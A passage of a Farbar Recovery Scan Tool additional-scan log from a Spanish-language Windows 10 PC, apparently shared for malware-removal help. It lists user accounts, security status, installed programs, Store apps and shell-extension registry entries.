Additional scan result of Farbar Recovery Scan Tool (x64) Version: 14-11-2019 Ran by Luis M (18-11-2019 19:33:00) Running from C:\Users\Luis M\Desktop Windows 10 Pro Version 1903 18362.449 (X64) (2019-05-30 20:18:54) Boot Mode: Normal ========================================================== ==================== Accounts: ============================= Administrador (S-1-5-21-1536180041-2647868905-2353555993-500 - Administrator - Enabled) => C:\Users\Administrador.PCLUISM DefaultAccount (S-1-5-21-1536180041-2647868905-2353555993-503 - Limited - Disabled) DevToolsUser (S-1-5-21-1536180041-2647868905-2353555993-1013 - Limited - Enabled) => C:\Users\DevToolsUser HomeGroupUser$ (S-1-5-21-1536180041-2647868905-2353555993-1005 - Limited - Enabled) Invitado (S-1-5-21-1536180041-2647868905-2353555993-501 - Limited - Disabled) Luis M (S-1-5-21-1536180041-2647868905-2353555993-1000 - Administrator - Enabled) => C:\Users\Luis M sshd (S-1-5-21-1536180041-2647868905-2353555993-1012 - Limited - Enabled) WDAGUtilityAccount (S-1-5-21-1536180041-2647868905-2353555993-504 - Limited - Disabled) ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Installed Programs ====================== (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) µTorrent (HKU\S-1-5-21-1536180041-2647868905-2353555993-1000\...\uTorrent) (Version: 3.5.5.45271 - BitTorrent Inc.) 64 Bit HP CIO Components Installer (HKLM\...\{FF21C3E6-97FD-474F-9518-8DCBE94C2854}) (Version: 7.2.8 - Hewlett-Packard) Hidden 7-Zip 19.00 (x64) (HKLM\...\7-Zip) (Version: 19.00 - Igor Pavlov) Adobe Acrobat DC (HKLM-x32\...\{AC76BA86-1033-FFFF-7760-0C0F074E4100}) (Version: 19.021.20056 - Adobe Systems Incorporated) Adobe Acrobat Reader DC - Español (HKLM-x32\...\{AC76BA86-7AD7-1034-7B44-AC0F074E4100}) (Version: 19.021.20056 - Adobe Systems Incorporated) Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 32.0.0.125 - Adobe) Adobe Flash Player 32 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 32.0.0.293 - Adobe) Akamai NetSession Interface (HKU\S-1-5-21-1536180041-2647868905-2353555993-1000\...\Akamai) (Version: - Akamai Technologies, Inc) Alcor Micro Smart Card Reader Driver (HKLM-x32\...\{F24F876B-7D71-4BD6-88E9-614D3BB84234}) (Version: 1.7.34.0 - Alcor Micro Corp.) Hidden Alcor Micro Smart Card Reader Driver (HKLM-x32\...\SZCCID) (Version: 1.7.45.16 - Alcor Micro Corp.) Apple Application Support (32 bits) (HKLM-x32\...\{BED24701-751B-41C5-8888-A8EABAB9FE8C}) (Version: 8.1 - Apple Inc.) Apple Application Support (64 bits) (HKLM\...\{88F21C94-88AF-4665-AF4F-FECB1FA059B9}) (Version: 8.1 - Apple Inc.) Apple Software Update (HKLM-x32\...\{A3985C05-7386-411F-A4BF-32A73F37EB44}) (Version: 2.6.3.1 - Apple Inc.) Asistente para actualización a Windows 10 (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.22899 - Microsoft Corporation) AutoFirma (HKLM-x32\...\AutoFirma) (Version: 1.6.5 - Gobierno de España) Backup and Sync from Google (HKLM\...\{93EBD8BA-7A14-4636-8F1F-E929ADF2C3A9}) (Version: 3.47.7654.0300 - Google, Inc.) Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.) CCleaner (HKLM\...\CCleaner) (Version: 5.59 - Piriform) Clover V3.4 (HKLM-x32\...\Clover) (Version: 3.4.3.04081 - 易捷科技) Cuadro de mensaje de excepción de Microsoft (HKLM\...\{847CE738-909B-4A98-9CF5-230EB23CA92D}) (Version: 9.00.5000.00 - Microsoft Corporation) Hidden Dropbox (HKLM-x32\...\Dropbox) (Version: 86.3.130 - Dropbox, Inc.) Dropbox Update Helper (HKLM-x32\...\{099218A5-A723-43DC-8DB5-6173656A1E94}) (Version: 1.3.243.1 - Dropbox, Inc.) Hidden EaseUS MobiMover 4.8 (HKLM-x32\...\EaseUS MobiMover_is1) (Version: - EaseUS) EaseUS Partition Master 12.10 (HKLM-x32\...\EaseUS Partition Master_is1) (Version: - EaseUS) EaseUS Todo Backup Free 11.5 (HKLM-x32\...\EaseUS Todo Backup_is1) (Version: 11.5 - CHENGDU YIWO Tech Development Co., Ltd) eMule (HKLM-x32\...\eMule) (Version: - ) Estudio para la mejora del producto HP DeskJet 3700 series (HKLM\...\{3CF6A944-B2AE-4E72-8A4D-2E2B8A5D1415}) (Version: 40.12.1161.1896 - HP Inc.) EVEREST Home Edition v2.20 (HKLM-x32\...\EVEREST Home Edition_is1) (Version: 2.20 - Lavalys Inc) foobar2000 v1.4 (HKLM-x32\...\foobar2000) (Version: 1.4 - Peter Pawlowski) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 78.0.3904.97 - Google LLC) Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.35.341 - Google LLC) Hidden HP DeskJet 3700 series Ayuda (HKLM-x32\...\{2BFC2EAF-07D6-4BF8-B470-898C41BDCE7E}) (Version: 40.0.0 - HP) HP DeskJet 3700 series Software básico del dispositivo (HKLM\...\{84816C42-CEA0-4D0F-A285-C35FB0CE1295}) (Version: 40.12.1161.1896 - HP Inc.) HP Dropbox Plugin (HKLM-x32\...\{7BEBB31E-58C4-4FA5-9AD1-ACBE32BF0D12}) (Version: 36.0.41.58587 - HP) HP ePrint SW (HKLM-x32\...\{cdb5f70f-5107-4613-bf69-15de903b5b5d}) (Version: 5.5.22560 - HP Inc.) HP Google Drive Plugin (HKLM-x32\...\{63BD9C12-5CE9-4294-B1C3-A09F971FAFB5}) (Version: 36.0.41.58587 - HP) HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.9572 - HP) HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard) iCloud (HKLM\...\{576BC8FA-1891-47C8-8A23-F3DDB78C06DE}) (Version: 7.15.0.10 - Apple Inc.) ImDisk Virtual Disk Driver (HKLM\...\ImDisk) (Version: * - LTR Data) Instalable DNIe (HKLM\...\{D2CE0562-13E0-4FC9-85F2-CA3D0392310E}) (Version: 14.0.0 - Cuerpo Nacional de Policía) IrfanView 4.51 (32-bit) (HKLM-x32\...\IrfanView) (Version: 4.51 - Irfan Skiljan) IrfanView 4.52 (64-bit) (HKLM\...\IrfanView64) (Version: 4.52 - Irfan Skiljan) Java 8 Update 231 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180231F0}) (Version: 8.0.2310.11 - Oracle Corporation) K-Lite Mega Codec Pack 14.0.0 (HKLM-x32\...\KLiteCodecPack_is1) (Version: 14.0.0 - KLCP) Magical Jelly Bean KeyFinder (HKLM-x32\...\KeyFinder_is1) (Version: 2.0.10.13 - Magical Jelly Bean) Malwarebytes version 4.0.4.49 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 4.0.4.49 - Malwarebytes) MEGAsync (HKLM-x32\...\MEGAsync) (Version: - Mega Limited) Mercedes-Benz - Download Manager (HKLM-x32\...\{AF442F54-4597-14CC-535A-14543FF9C687}) (Version: 3.0.12 - Mercedes-Benz Accessories GmbH) Hidden Mercedes-Benz - Download Manager (HKLM-x32\...\com.mercedes-benz.downloadManager) (Version: 3.0.12 - Mercedes-Benz Accessories GmbH) Microsoft Office Profesional Plus 2016 - es-es (HKLM\...\ProPlusRetail - es-es) (Version: 16.0.12130.20272 - Microsoft Corporation) Microsoft OneDrive (HKU\S-1-5-21-1536180041-2647868905-2353555993-1000\...\OneDriveSetup.exe) (Version: 19.174.0902.0013 - Microsoft Corporation) Microsoft SQL Server Compact 4.0 SP1 x64 ESN (HKLM\...\{D7126FFC-90BA-4120-8FFB-3688C9931A09}) (Version: 4.0.8876.1 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660 (HKLM-x32\...\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}) (Version: 12.0.40660.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40660 (HKLM-x32\...\{61087a79-ac85-455c-934d-1fa22cc64f36}) (Version: 12.0.40660.0 - Microsoft Corporation) Microsoft Visual C++ 2017 Redistributable (x86) - 14.16.27027 (HKLM-x32\...\{39e28474-b67b-4209-af1b-e9ad0a83d8ca}) (Version: 14.16.27027.1 - Microsoft Corporation) Mozilla Firefox 69.0.1 (x64 es-ES) (HKLM\...\Mozilla Firefox 69.0.1 (x64 es-ES)) (Version: 69.0.1 - Mozilla) Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 67.0.2 - Mozilla) Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.12130.20272 - Microsoft Corporation) Hidden Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.12130.20272 - Microsoft Corporation) Hidden Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.12130.20272 - Microsoft Corporation) Hidden Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0C0A-0000-0000000FF1CE}) (Version: 16.0.12130.20272 - Microsoft Corporation) Hidden Opera Stable 64.0.3417.92 (HKU\S-1-5-21-1536180041-2647868905-2353555993-1000\...\Opera 64.0.3417.92) (Version: 64.0.3417.92 - Opera Software) Paquete de controladores de Windows - libusb-win32 WorldCup Device (02/23/2013 1.2.6.0) (HKLM\...\607E81836F3E58EDC7289F7B7047149AE2C7F301) (Version: 02/23/2013 1.2.6.0 - libusb-win32) Plex Media Server (HKLM-x32\...\{06F175F5-D6CA-438F-B1E6-E9F1FB2735FF}) (Version: 1.16.1554 - Plex, Inc.) Hidden Plex Media Server (HKLM-x32\...\{6b47007f-5e5b-40bb-8655-d2530bedcec2}) (Version: 1.16.5.1554 - Plex, Inc.) Polar FlowSync versión 3.0.0.1337 (HKLM-x32\...\{A1538F5C-7B65-4DB6-9FFB-FFC0DF2E85D8}_is1) (Version: 3.0.0.1337 - Polar Electro Oy) PuTTY release 0.70 (64-bit) (HKLM\...\{45B3032F-22CC-40CD-9E97-4DA7095FA5A2}) (Version: 0.70.0.0 - Simon Tatham) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8581 - Realtek Semiconductor Corp.) SD Card Formatter (HKLM-x32\...\{A61131DC-B92D-4AD8-A925-E2D6D5FE217C}) (Version: 5.0.1 - SD Association) SHAREit (HKLM-x32\...\www.ushareit.com_is1) (Version: 4.0.6.177 - SHAREit Technologies Co.Ltd) SimEdit (HKLM-x32\...\{2BC913A5-4C55-4677-B3B9-F13665CC16C3}) (Version: 1.00.0000 - ) SopCast 4.2.0 (HKLM-x32\...\SopCast) (Version: 4.2.0 - www.sopcast.com) Stopping Plex (HKLM-x32\...\{783867B4-5DA3-470A-9882-3F18DAA454A7}) (Version: 1.16.1554 - Plex, Inc.) Hidden SumatraPDF (HKLM\...\SumatraPDF) (Version: 3.1.2 - Krzysztof Kowalczyk) TeamViewer 14 (HKLM-x32\...\TeamViewer) (Version: 14.7.1965 - TeamViewer) Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{C99F4AFA-B32C-4063-865C-D7B5CC0A78FB}) (Version: 2.54.0.0 - Microsoft Corporation) USB_Burning_Tool (HKLM-x32\...\{0F91E44C-2FAD-4298-8051-40E52C7E1341}_is1) (Version: 1.1.0 - Amlogic, Inc.) Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies) Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.) VLC media player (HKLM-x32\...\VLC media player) (Version: 3.0.7.1 - VideoLAN) Win32DiskImager version 1.0.0 (HKLM-x32\...\{3DFFA293-DF2C-4B23-92E5-3433BDC310E1}}_is1) (Version: 1.0.0 - ImageWriter Developers) Windows Driver Package - Dirección General de la Policía (UMPass) SmartCard (11/23/2017 1.0.2.6) (HKLM\...\4156F59B733E1BC3DE3D5DA2299224A42B2FF794) (Version: 11/23/2017 1.0.2.6 - Dirección General de la Policía) Wondershare Helper Compact 2.5.3 (HKLM-x32\...\{5363CE84-5F09-48A1-8B6C-6BB590FFEDF2}_is1) (Version: 2.5.3 - Wondershare) Wondershare UniConverter(Build 11.0.0.218) (HKLM-x32\...\UniConverter_is1) (Version: 11.0.0.218 - Wondershare Software) Packages: ========= Acrobat Notification Client -> C:\Program Files\WindowsApps\AcrobatNotificationClient_1.0.4.0_x86__e1rzdqpraam7r [2019-05-19] (Adobe Systems Incorporated) Atresplayer -> C:\Program Files\WindowsApps\Antena3deTelevision.Atresplayer_1.9.3.32_x64__3ngerjpn7j994 [2018-01-26] (Atresmedia Corporacion de Medios de Comunicacion) Best of Bing 2018 Exclusive -> C:\Program Files\WindowsApps\Microsoft.BestofBing2018Exclusive_1.0.0.0_neutral__8wekyb3d8bbwe [2019-01-09] (Microsoft Corporation) Community Showcase Dramatic Skies 3 -> C:\Program Files\WindowsApps\Microsoft.CommunityShowcaseDramaticSkies3_1.0.0.0_neutral__8wekyb3d8bbwe [2018-02-05] (Microsoft Corporation) Community Showcase Natural Landscapes -> C:\Program Files\WindowsApps\Microsoft.CommunityShowcaseNaturalLandscapes_1.0.0.0_neutral__8wekyb3d8bbwe [2018-02-11] (Microsoft Corporation) Complemento de motor del medio de Fotos -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2019-09-22] (Microsoft Corporation) Correo y Calendario -> C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12026.20218.0_x64__8wekyb3d8bbwe [2019-09-27] (Microsoft Corporation) [MS Ad] Dropbox para modo S -> C:\Program Files\WindowsApps\C27EB4BA.DROPBOX_22.4.3.0_x64__xbfy0k16fey96 [2019-09-27] (Dropbox Inc.) EdgeDevtoolsPlugin -> C:\WINDOWS\SystemApps\Microsoft.EdgeDevtoolsPlugin_cw5n1h2txyewy [2019-10-25] (Microsoft Corporation) Extensiones de vídeo HEVC -> C:\Program Files\WindowsApps\Microsoft.HEVCVideoExtensions_1.0.22763.0_x64__8wekyb3d8bbwe [2019-10-29] (Microsoft Corporation) Facebook -> C:\Program Files\WindowsApps\Facebook.Facebook_186.2619.19263.0_x86__8xx8rvfyw5nnt [2019-10-22] (Facebook Inc) Fitbit -> C:\Program Files\WindowsApps\Fitbit.Fitbit_2.44.1997.0_x64__6mqt6hf9g46tw [2019-10-04] (Fitbit) Fondos de Naturaleza -> C:\Program Files\WindowsApps\OnionSoftware.FreeNatureWallpapers_1.1.2.0_x64__ervdxkv9fa05r [2018-02-05] (Opening Code LTD) [MS Ad] HP Smart -> C:\Program Files\WindowsApps\AD2F1837.HPPrinterControl_105.1.618.0_x64__v10z8vjag6ke6 [2019-10-17] (HP Inc.) Instagram -> C:\Program Files\WindowsApps\Facebook.InstagramBeta_41.1788.50991.0_x86__8xx8rvfyw5nnt [2018-07-25] (Instagram) Islands in the Sun -> C:\Program Files\WindowsApps\Microsoft.IslandsintheSun_1.0.0.0_neutral__8wekyb3d8bbwe [2018-03-12] (Microsoft Corporation) iTunes -> C:\Program Files\WindowsApps\AppleInc.iTunes_12102.3.43028.0_x64__nzyj5cx40ttqa [2019-10-29] (Apple Inc.) [Startup Task] Messenger -> C:\Program Files\WindowsApps\Facebook.317180B0BB486_196.2292.59195.0_x86__8xx8rvfyw5nnt [2019-05-09] (Facebook Inc) Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-01-27] (Microsoft Corporation) [MS Ad] Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-01-27] (Microsoft Corporation) [MS Ad] Microsoft News: Noticias destacadas en español -> C:\Program Files\WindowsApps\Microsoft.BingNews_4.32.12463.0_x64__8wekyb3d8bbwe [2019-09-11] (Microsoft Corporation) [MS Ad] Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.10022.0_x64__8wekyb3d8bbwe [2019-10-07] (Microsoft Studios) [MS Ad] MSN El Tiempo -> C:\Program Files\WindowsApps\Microsoft.BingWeather_4.32.12463.0_x64__8wekyb3d8bbwe [2019-09-11] (Microsoft Corporation) [MS Ad] Netflix -> C:\Program Files\WindowsApps\4DF9E0F8.Netflix_6.95.602.0_x64__mcm4njqhnhss8 [2019-10-25] (Netflix, Inc.) SHARE.it -> C:\Program Files\WindowsApps\30608Paradox.SHAREit81_1.7.18.0_x64__ghshvk1r7eapp [2019-08-08] (SHAREit Technologies Co.Ltd) [MS Ad] Spotify Music -> C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.118.611.0_x86__zpdnekdrzrea0 [2019-11-02] (Spotify AB) [Startup Task] Touring Spain -> C:\Program Files\WindowsApps\Microsoft.TouringSpain_1.0.0.0_neutral__8wekyb3d8bbwe [2018-03-12] (Microsoft Corporation) Twitter -> C:\Program Files\WindowsApps\9E2F88E3.Twitter_6.1.4.1000_neutral__wgeqdkkx372wm [2018-09-09] (Twitter Inc.) Up in the Sky -> C:\Program Files\WindowsApps\Microsoft.UpintheSky_2.0.0.0_neutral__8wekyb3d8bbwe [2019-03-01] (Microsoft Corporation) WhatsApp Desktop -> C:\Program Files\WindowsApps\5319275A.WhatsAppDesktop_0.3.5149.0_x64__cv1g1gvanyjgm [2019-10-22] (WhatsApp Inc.) ==================== Custom CLSID (Whitelisted): ============== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) CustomCLSID: HKU\S-1-5-21-1536180041-2647868905-2353555993-1000_Classes\CLSID\{004B49B7-11B9-5058-AA22-08DD0A3ADC4B}\InprocServer32 -> {1FB2DC83-9468-D082-D54C-C3EE85889A47} => No File CustomCLSID: HKU\S-1-5-21-1536180041-2647868905-2353555993-1000_Classes\CLSID\{3D3B1846-CC43-42AE-BFF9-D914083C2BA3}\InprocServer32 -> C:\Program Files\SumatraPDF\PdfPreview.dll () [File not signed] CustomCLSID: HKU\S-1-5-21-1536180041-2647868905-2353555993-1000_Classes\CLSID\{55808EA8-81FE-43c6-AAE8-1D8149F941D3}\InprocServer32 -> C:\Program Files\SumatraPDF\PdfFilter.dll () [File not signed] CustomCLSID: HKU\S-1-5-21-1536180041-2647868905-2353555993-1000_Classes\CLSID\{7A76710F-DDEB-466B-8015-6F2E8DFF50FB} -> [MEGA] => C:\Users\Luis M\Documents\MEGA [2014-11-21 21:29] CustomCLSID: HKU\S-1-5-21-1536180041-2647868905-2353555993-1000_Classes\CLSID\{DD0822AA-3A0A-4BDC-B749-4B00B9115850}\InprocServer32 -> {5739B81D-9468-D082-4B28-48A685889A47} => No File CustomCLSID: HKU\S-1-5-21-1536180041-2647868905-2353555993-1000_Classes\CLSID\{E31EA727-12ED-4702-820C-4B6445F28E1A} -> [Dropbox] => C:\Users\Luis M\Dropbox [2014-03-30 23:27] ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2019-09-16] (Mega Limited -> ) ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2019-09-16] (Mega Limited -> ) ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2019-09-16] (Mega Limited -> ) ShellIconOverlayIdentifiers: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-30] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-30] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-30] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-30] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-30] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-30] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-30] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-30] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-30] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-30] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers: [ GoogleDriveBlacklisted] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files\Google\Drive\googledrivesync64.dll [2019-10-24] (Google LLC -> Google) ShellIconOverlayIdentifiers: [ GoogleDriveSynced] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files\Google\Drive\googledrivesync64.dll [2019-10-24] (Google LLC -> Google) ShellIconOverlayIdentifiers: [ GoogleDriveSyncing] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files\Google\Drive\googledrivesync64.dll [2019-10-24] (Google LLC -> Google) ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2019-09-16] (Mega Limited -> ) ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2019-09-16] (Mega Limited -> ) ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2019-09-16] (Mega Limited -> ) ShellIconOverlayIdentifiers-x32: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-30] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-30] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-30] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-30] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-30] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-30] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-30] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-30] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-30] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-30] (Dropbox, Inc -> Dropbox, Inc.) ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2019-02-21] (Igor Pavlov) [File not signed] ContextMenuHandlers1: [Adobe.Acrobat.ContextMenu] -> {A6595CD1-BF77-430A-A452-18696685F7C7} => C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat Elements\ContextMenuShim64.dll [2015-03-17] (Adobe Systems, Incorporated -> Adobe Systems Inc.) ContextMenuHandlers1: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-30] (Dropbox, Inc -> Dropbox, Inc.) ContextMenuHandlers1: [GDContextMenu] -> {BB02B294-8425-42E5-983F-41A1FA970CD6} => C:\Program Files\Google\Drive\contextmenu64.dll [2019-10-24] (Google LLC -> Google) ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2019-09-16] (Mega Limited -> ) ContextMenuHandlers1: [PhotoStreamsExt] -> {89D984B3-813B-406A-8298-118AFA3A22AE} => C:\Program Files\Common Files\Apple\Internet Services\ShellStreams64.dll [2019-10-25] (Apple Inc. -> Apple Inc.) ContextMenuHandlers1: [SimpleShlExt] -> {45203D3B-3D73-4497-8AFE-D29950AC6C55} => C:\Program Files (x86)\EaseUS\Todo Backup\bin\x64\ImageSh.dll [2018-08-14] (CHENGDU YIWO Tech Development Co., Ltd. -> CHENGDU YIWO Tech Development Co.,Ltd) [File not signed] ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2019-09-16] (Mega Limited -> ) ContextMenuHandlers2: [SimpleShlExt] -> {45203D3B-3D73-4497-8AFE-D29950AC6C55} => C:\Program Files (x86)\EaseUS\Todo Backup\bin\x64\ImageSh.dll [2018-08-14] (CHENGDU YIWO Tech Development Co., Ltd. -> CHENGDU YIWO Tech 